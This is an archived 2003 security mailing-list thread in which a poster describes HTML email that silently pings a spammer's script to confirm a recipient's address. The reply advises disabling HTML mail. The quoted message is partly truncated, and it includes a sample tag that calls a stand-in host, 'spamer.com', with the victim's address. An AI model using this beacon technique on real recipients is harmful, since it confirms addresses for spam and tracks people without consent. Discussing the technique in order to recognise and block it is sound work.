Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > webappsec > 03 > 040696.html (Request Expert securityfocus.com Support)

Re: spam technique name?

From: Jamie Pratt <jamie(at)nucdc.org>
Date: Tue Apr 22 2003 - 13:34:48 EDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Although I don't know any specific name for this, it's really not a new technique at all - that is why most of us (sane) people disable inbound html emails at the client level and just show the plaintext (html).

regards,
jamie

Calderon, Juan C (CORP, DDEMESIS) wrote:

> Hello all
spammers, I don't know a common name or something for such a technique, so if you know it please let me know.
>
> PROBLEM
well known "Remove Me" link which, in fact, will confirm user read the message (and probably will be bombed with many more, now that he said "hey!, I'm here"). However, it requires user interaction.
>
> SOLUTION
example) or Script tag in the HTML mail, all those elements indicate Web browsers to send a GET request using the SRC or HREF attribute, without user interaction.
>
> Sample Code (Mail sent to ficticious peter@foomail.com)
src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
> Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a>
to be removed<br>
> NOTE:the presence of this link indicates this is not spamming even
if you don't ask for this email
> </BODY>
automatically send a request for a "image" file served by a Server-side script, first recording the data without explicit authorization.
>
> I've tested this (using 3 different tags) using Exchange and some
others public accounts. I have succeed in all cases.
>
> So have you seen something similar? do you think this is a kind of
XSS? I do.
>
> cheers :)

  • --

Jamie Pratt
Systems Administrator/Programmer Analyst Norwich University Course Development Center jamie@nucdc.org | ph. (802)485-2532

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.94

Do you need help?X

iD8DBQE+pX0mFnM/ewGVQ7IRArOBAKCADozntexoxPiswN8+lbGP2aWXnQCdGFz5 lbp/9gWPBdFmHx+lplhCU6k=
=VxTI
-----END PGP SIGNATURE----- Received on Tue Apr 22 13:58:08 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:50 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library